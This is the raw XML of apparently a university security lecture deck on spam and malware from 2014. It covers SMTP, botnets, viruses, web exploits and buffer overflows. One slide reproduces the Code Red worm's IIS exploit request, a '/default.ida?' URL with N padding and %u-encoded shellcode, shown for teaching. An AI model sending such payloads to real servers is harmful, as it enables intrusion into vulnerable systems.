        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>NNNNNNNNNNNNNNNNNNNNNNNNNNNNN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>u9090%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>u6858%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ucbd3%u78</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>01%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>u9090%u6858%ucbd3%u7801%u9090</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>%u6858</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>%ucbd3%u7801</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>u9090</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>%u9090%u8190%u00c3%u0003%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>u8b00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>%u531b%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>u53ff%u00</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>78%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>u0000%u00=a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19107643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Any questions?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{39D18CF7-64E8-1F41-A41E-28D58F3FD788}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>89</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 2" descr="C:\Users\Andreas Haeberlen\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7HA4Z6A0\MC900434411[1].wmf"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4058022" y="2850776"/>
            <a:ext cx="1326777" cy="1492624"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2555999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of Online Pharmaceutical Affiliate Programs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="5638800"/>
            <a:ext cx="5409053" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Source: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>McCoy et al., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>PharmaLeaks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>: Understanding the Business </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Online </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Pharmaceutical Affiliate Programs, 2012</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4876800" y="2895600"/>
            <a:ext cx="2688590" cy="2132330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="2438400"/>
            <a:ext cx="3733800" cy="2791968"/>
            <a:chOff x="4038600" y="1475232"/>
            <a:chExt cx="3733800" cy="2791968"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="Picture 7"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4038600" y="1727543"/>
              <a:ext cx="3733800" cy="2539657"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="Picture 10"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4572000" y="1475232"/>
              <a:ext cx="2883408" cy="201168"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4876800" y="2438400"/>
            <a:ext cx="2900172" cy="201168"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Date Placeholder 13"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Footer Placeholder 14"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Slide Number Placeholder 15"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C270C27E-8536-9149-9DA9-3AFF6BC96CEE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2438799646"/>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4648200"/>
            <a:ext cx="5638800" cy="1362075"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Network vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286000" y="3124200"/>
            <a:ext cx="5638800" cy="1500187"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Next time you will learn </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>about</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BDF11DD4-9FA1-DC41-AC8A-B26E2EC1E386}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>90</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="1752601"/>
            <a:ext cx="2743200" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="3200" b="0" kern="1200" cap="none" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Rockwell"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Stay tuned</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23000" y="381000"/>
            <a:ext cx="5040000" cy="3780000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="119130326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mcanini-teaching">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mcanini-teaching.thmx</Template>
  <TotalTime>1988</TotalTime>
  <Words>5668</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>981</Paragraphs>
  <Slides>90</Slides>
  <Notes>51</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>0</MMClips>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="4" baseType="variant">
      <vt:variant>
        <vt:lpstr>Theme</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>Slide Titles</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>90</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="91" baseType="lpstr">
      <vt:lpstr>mcanini-teaching</vt:lpstr>
      <vt:lpstr>Spam | Malware</vt:lpstr>
      <vt:lpstr>Announcements</vt:lpstr>
      <vt:lpstr>Plan for today</vt:lpstr>
      <vt:lpstr>Introduction to Spam</vt:lpstr>
      <vt:lpstr>Email spam</vt:lpstr>
      <vt:lpstr>Why is it a problem?</vt:lpstr>
      <vt:lpstr>The 10 Worst Spam Countries</vt:lpstr>
      <vt:lpstr>Most common products advertised</vt:lpstr>
      <vt:lpstr>Business of Online Pharmaceutical Affiliate Programs</vt:lpstr>
      <vt:lpstr>Infrastructure involved in a single URL’s value chain</vt:lpstr>
      <vt:lpstr>Spamming Techniques</vt:lpstr>
      <vt:lpstr>Spamming Techniques</vt:lpstr>
      <vt:lpstr>SMTP</vt:lpstr>
      <vt:lpstr>SMTP example</vt:lpstr>
      <vt:lpstr>Mail Path</vt:lpstr>
      <vt:lpstr>Forged Emails</vt:lpstr>
      <vt:lpstr>Limitation: originating system can be traced</vt:lpstr>
      <vt:lpstr>Tracking</vt:lpstr>
      <vt:lpstr>Spamming Techniques (Cont’)</vt:lpstr>
      <vt:lpstr>Limitation: servers do not operate as open relays</vt:lpstr>
      <vt:lpstr>Spamming Techniques (Cont’)</vt:lpstr>
      <vt:lpstr>How it works</vt:lpstr>
      <vt:lpstr>Botnets (illegal)</vt:lpstr>
      <vt:lpstr>Botnets for Sale</vt:lpstr>
      <vt:lpstr>How do spammers harvest email addresses?</vt:lpstr>
      <vt:lpstr>Hoax example</vt:lpstr>
      <vt:lpstr>Fighting spam</vt:lpstr>
      <vt:lpstr>Stopping spam</vt:lpstr>
      <vt:lpstr>Filters</vt:lpstr>
      <vt:lpstr>SpamAssassin</vt:lpstr>
      <vt:lpstr>Rule example</vt:lpstr>
      <vt:lpstr>Black lists</vt:lpstr>
      <vt:lpstr>Policy Block List</vt:lpstr>
      <vt:lpstr>White lists</vt:lpstr>
      <vt:lpstr>Spam database</vt:lpstr>
      <vt:lpstr>Greylisting</vt:lpstr>
      <vt:lpstr>Greylisting</vt:lpstr>
      <vt:lpstr>Alternative solutions ?</vt:lpstr>
      <vt:lpstr>At UCL</vt:lpstr>
      <vt:lpstr>Plan for today</vt:lpstr>
      <vt:lpstr>Malware</vt:lpstr>
      <vt:lpstr>Malicious code or Malware</vt:lpstr>
      <vt:lpstr>Malicious code or Malware</vt:lpstr>
      <vt:lpstr>Effects of Malware</vt:lpstr>
      <vt:lpstr>Viruses &amp; Worms</vt:lpstr>
      <vt:lpstr>Virus/Worm Writer’s Goals</vt:lpstr>
      <vt:lpstr>Virus Evolution</vt:lpstr>
      <vt:lpstr>Virus Evolution</vt:lpstr>
      <vt:lpstr>Kind of Viruses</vt:lpstr>
      <vt:lpstr>Stealth Viruses</vt:lpstr>
      <vt:lpstr>Polymorphic Viruses</vt:lpstr>
      <vt:lpstr>Strategies for Polymorphic Viruses</vt:lpstr>
      <vt:lpstr>Melissa Macro Virus</vt:lpstr>
      <vt:lpstr>Love Letter Worm, aka «ILOVEYOU»</vt:lpstr>
      <vt:lpstr>ILOVEYOU Impact</vt:lpstr>
      <vt:lpstr>Backdoors</vt:lpstr>
      <vt:lpstr>Spywares &amp; Adwares</vt:lpstr>
      <vt:lpstr>Rootkits</vt:lpstr>
      <vt:lpstr>Exploits on the Web</vt:lpstr>
      <vt:lpstr>Exploits</vt:lpstr>
      <vt:lpstr>Summary of Exploits on the Web</vt:lpstr>
      <vt:lpstr>Directory Traversal</vt:lpstr>
      <vt:lpstr>Directory Traversal Example</vt:lpstr>
      <vt:lpstr>Avoiding Directory Traversal</vt:lpstr>
      <vt:lpstr>Avoiding Directory Traversal</vt:lpstr>
      <vt:lpstr>Abusing Web Applications</vt:lpstr>
      <vt:lpstr>Abusing Web Applications: Example</vt:lpstr>
      <vt:lpstr>Abusing Web Applications: Example</vt:lpstr>
      <vt:lpstr>Abusing Web Applications: Example</vt:lpstr>
      <vt:lpstr>Abusing Web Applications: Example</vt:lpstr>
      <vt:lpstr>Abusing Web Applications: Example</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting: General Picture</vt:lpstr>
      <vt:lpstr>Phishing</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>Sanitize your database inputs!</vt:lpstr>
      <vt:lpstr>Buffer Overflow</vt:lpstr>
      <vt:lpstr>Buffer Overflow</vt:lpstr>
      <vt:lpstr>Reminder: The Stack</vt:lpstr>
      <vt:lpstr>Reminder: The Stack</vt:lpstr>
      <vt:lpstr>Example [Wikipedia]</vt:lpstr>
      <vt:lpstr>Example [Wikipedia]</vt:lpstr>
      <vt:lpstr>Example [Wikipedia]</vt:lpstr>
      <vt:lpstr>Difficulties</vt:lpstr>
      <vt:lpstr>Defeating Buffer Overflows</vt:lpstr>
      <vt:lpstr>Code Red Worm, July 2001</vt:lpstr>
      <vt:lpstr>Code Red’s exploit</vt:lpstr>
      <vt:lpstr>Any questions?</vt:lpstr>
      <vt:lpstr>Network vulnerabilities</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>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dc:title>
